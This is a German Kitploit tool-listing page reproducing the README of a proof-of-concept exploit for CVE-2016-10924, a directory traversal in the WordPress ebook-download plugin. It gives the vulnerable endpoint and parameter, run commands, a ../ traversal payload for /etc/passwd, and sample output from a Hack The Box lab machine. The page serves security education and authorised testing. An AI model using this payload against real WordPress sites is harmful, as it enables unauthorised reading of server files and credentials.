Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2016-10924-POC — Proof-of-Concept (PoC) Exploit-Skript für die Directory-Traversal-Schwachstelle (CVE-2016-10924), die im WordPress-Plugin ebook-download (Versionen < 1.2) gefunden wurde. Diese Schwachstelle ermöglicht unbefugte Dateiauslese über eine manipulierte GET-Anfrage. | Kitploit
Tools/GitHubGitHub/alealeluyah/cve-2016-10924-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Proof-of-Concept (PoC) Exploit-Skript für die Directory-Traversal-Schwachstelle (CVE-2016-10924), die im WordPress-Plugin ebook-download (Versionen < 1.2) gefunden wurde. Diese Schwachstelle ermöglicht unbefugte Dateiauslese über eine manipulierte GET-Anfrage.

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2016-10924-POC

Dieses Repository enthält ein Proof-of-Concept (PoC)-Exploit-Skript für die Directory Traversal-Schwachstelle (CVE-2016-10924), die im WordPress-Plugin ebook-download (Versionen < 1.2) gefunden wurde.

Diese Schwachstelle ermöglicht unbefugte Dateiauslesen über eine manipulierte GET-Anfrage. Der Exploit nutzt einen Parameter namens ebookdownloadurl, um Verzeichnisse auf dem Zielserver zu traversieren.

Beschreibung

  • CVE-ID: CVE-2016-10924
  • Anfälligkeitstyp: Directory Traversal
  • Betroffene Komponente: ebook-download-Plugin < 1.2 für WordPress
  • Auswirkung: Remote-Angreifer können beliebige Dateien auf dem zugrunde liegenden Betriebssystem lesen, z. B. /etc/passwd, indem sie den Dateipfad im Parameter ebookdownloadurl manipulieren.

Hinweis: Dieses PoC dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Missbrauch dieser Informationen kann rechtliche Konsequenzen haben.

Voraussetzungen

  • Python 3.
  • requests-Bibliothek (Installation mit pip install requests)

Verwendung

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. Abhängigkeiten installieren:

    root@kitploit:~
    pip install requests
    
  3. Exploit ausführen:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. Dateipfad angeben, der gelesen werden soll: Nach dem Start des Skripts werden Sie zur Eingabe eines Dateipfads aufgefordert. Beispiel:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    Möglicherweise müssen Sie die Anzahl der ../ je nach Webroot-Verzeichnis in der Zielumgebung anpassen.

  5. Beenden:

    • Geben Sie exit, quit ein oder drücken Sie Enter bei leerer Eingabeaufforderung, um zu beenden.
    • Drücken Sie Strg + C, um das Skript sofort zu stoppen.

Beispiel

Ich habe diesen Exploit auf „Backdoor“, einer archivierten Hack The Box-Maschine, verwendet:

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...

Haftungsausschluss

Dieses Projekt ist ausschließlich für Bildungs- und legitime Sicherheitstestzwecke vorgesehen.
Verwenden Sie die Informationen oder Skripte in diesem Repository nicht auf Systemen, für die Sie keine ausdrückliche Berechtigung zum Testen haben.
Autor und Mitwirkende sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Lizenz

Dieses Projekt ist unter der GNU 2.0-Lizenz lizenziert. Sie können es frei verwenden und modifizieren, aber bitte geben Sie Anerkennung.


Referenzen

  • NVD - CVE-2016-10924
  • WordPress Plugin ebook-download (als Referenz für verwundbare Versionen)
Tool herunterladen